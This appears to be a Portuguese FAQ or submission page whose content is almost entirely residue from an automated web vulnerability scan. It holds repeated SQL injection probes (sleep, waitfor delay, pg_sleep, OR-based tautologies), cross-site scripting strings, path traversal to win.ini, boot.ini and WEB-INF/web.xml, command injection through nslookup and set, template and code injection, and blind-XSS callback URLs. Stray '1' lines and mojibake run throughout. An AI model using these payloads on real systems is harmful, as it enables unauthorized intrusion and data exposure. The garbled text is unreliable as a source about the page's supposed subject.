Encontre aqui a resposta para algumas dúvidas comuns.

!(()&&!|*|*|
1
'"
1
�'�"
1
�''�""
1
'"()
1
";print(md5(acunetix_wvs_security_test));$a="
1
"+response.write(9500215*9506880)+"
1
$(nslookup bMDqamaX)
1
${@print(md5(acunetix_wvs_security_test))}
1
${@print(md5(acunetix_wvs_security_test))}\
1
${10000264+9999879}
1
%31%3C%53%63%52%69%50%74%20%3E%4A%54%41%70%289788%29%3C%2F%73%43%72%69%70%54%3E
1
&nslookup i3U1Ey8l&'\"`0&nslookup i3U1Ey8l&`'
1
(select convert(int,CHAR(65)))
1
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
1
)
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
................windowswin.ini
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
../../../../../../../../../../boot.ini
1
../../../../../../../../../../windows/win.ini
1
../../../../../../../../../../windows/win.ini.jpg
1
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
..\..\..\..\..\..\..\..\windows\win.ini
1
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
/www.vulnweb.com
1
;print(md5(acunetix_wvs_security_test));
1
';print(md5(acunetix_wvs_security_test));$a='
1
@@A65ap
1
[url=http://www.vulnweb.com][/url]
1
\
1
^(#[email protected]#$)(()))******
1
{{9999794*10000431}}
1
'+response.write(9500215*9506880)+'
1
1
${10000095+10000154}
1
1
1
tTfcfCPu
1
1
1
1
1
1&n945887=v999261
1
1
1
response.write(9758230*9981162)
1
)
1
set|set&set
1
1
1
1some_inexistent_file_with_long_name.jpg
1
!(()&&!|*|*|
1
'+response.write(9758230*9981162)+'
1
12345'"\'\");|]*{ <>�''💩
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
$(nslookup fNqPpxBX)
1
^(#[email protected]#$)(()))******
1
"+response.write(9758230*9981162)+"
1
Http://testasp.vulnweb.com/t/fit.txt
1
http://testasp.vulnweb.com/t/fit.txt?.jpg
1
;print(md5(acunetix_wvs_security_test));
1
testasp.vulnweb.com
1
'"()
1
&nslookup WpJ5ADqE&'\"`0&nslookup WpJ5ADqE&`'
1
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
/www.vulnweb.com
1
criar
1
${@print(md5(acunetix_wvs_security_test))}\
1
../../../../../../../../../../windows/win.ini
1
criar/.
1
'"
1
../../../../../../../../../../windows/win.ini.jpg
1
../../../../../../../../../../boot.ini
1
http://hitdOtWesU53V.bxss.me/
1
${@print(md5(acunetix_wvs_security_test))}
1
';print(md5(acunetix_wvs_security_test));$a='
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1����
1
1
";print(md5(acunetix_wvs_security_test));$a="
1
criar
1
������������������������������������������������windows��win.ini
1
1'"
1
................windowswin.ini
1
\
1
1����
1
..\..\..\..\..\..\..\..\windows\win.ini
1
@@T4cWW
1
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
JyI=
1
�'�"
1
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
�''�""
1
WEB-INF/web.xml
1
1
1
WEB-INF\web.xml
1
1
1
iTkvaqMK
1
-1 OR 2+884-884-1=0+0+0+1 --
1
-1 OR 2+565-565-1=0+0+0+1
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
(select convert(int,CHAR(65)))
1
-1' OR 2+408-408-1=0+0+0+1 --
1
-1' OR 2+406-406-1=0+0+0+1 or 'zfDWOZNW'='
1
-1" OR 2+182-182-1=0+0+0+1 --
1
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
1
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
1
-1; waitfor delay '0:0:6' --
1
-1); waitfor delay '0:0:6' --
1
-1)); waitfor delay '0:0:6' --
1
1 waitfor delay '0:0:9' --
1
21XleSMT'; waitfor delay '0:0:9' --
1
Nf4wC56W'); waitfor delay '0:0:9' --
1
2ZyRnRRh')); waitfor delay '0:0:9' --
1
-1;select pg_sleep(3); --
1
-1);select pg_sleep(3); --
1
-1));select pg_sleep(6); --
1
HV0vYZoA';select pg_sleep(6); --
1
PEivs92u');select pg_sleep(6); --
1
J3vqlwe0'));select pg_sleep(9); --
1
1
1
1
1
1_9378
-1 OR 2+146-146-1=0+0+0+1
1
-1' OR 2+696-696-1=0+0+0+1 or 'R9FSHQ8C'='
1
-1 OR 2+852-852-1=0+0+0+1 --
1
-1' OR 2+926-926-1=0+0+0+1 --
1
1 waitfor delay '0:0:6' --
1
1'"
1
-1" OR 2+71-71-1=0+0+0+1 --
1
1&lt;ScRiPt&gt;JTAp(9540)&lt;/sCripT&gt;
1
1&n954333=v993505
1
-1)); waitfor delay '0:0:3' --
1
-1));select pg_sleep(9); --
1
-1); waitfor delay '0:0:3' --
1
-1);select pg_sleep(6); --
1
-1; waitfor delay '0:0:3' --
1
-1;select pg_sleep(6); --
1
1\u003CScRiPt\JTAp(9691)\u003C/sCripT\u003E
1
1_9855
1
1}body{acu:Expre/**/SSion(JTAp(9425))}
1
1<% contenteditable onresize=JTAp(9316)>
1
1<%div style=width:expression(JTAp(9257))>
1
12345'"\'\");|]*{ <>�''💩
1
1some_inexistent_file_with_long_name.jpg
1
9B9dvZJx'; waitfor delay '0:0:6' --
1
acu6672<s1﹥s2ʺs3ʹuca6672
1
acux5471��z1��z2a�bcxuca5471
1
aOktK2jh'); waitfor delay '0:0:6' --
1
asd
sadsad
criar
1
criar
1
criar/.
1
H0icsZHo')); waitfor delay '0:0:6' --
1
http://hitsIqUWzrHKh.bxss.me/
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
Http://testasp.vulnweb.com/t/fit.txt
1
http://testasp.vulnweb.com/t/fit.txt?.jpg
1
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
1
JyI=
1
neBJaHSy');select pg_sleep(9); --
1
response.write(9500215*9506880)
1
SCrNgnxY
1
set|set&set
1
testasp.vulnweb.com
1
tlMsUjvU';select pg_sleep(9); --
1
TQ67hEPv'));select pg_sleep(9); --
1
vWdZ8GH8
1
WEB-INF/web.xml
1
WEB-INF\web.xml
1
������������������������������������������������windows��win.ini
1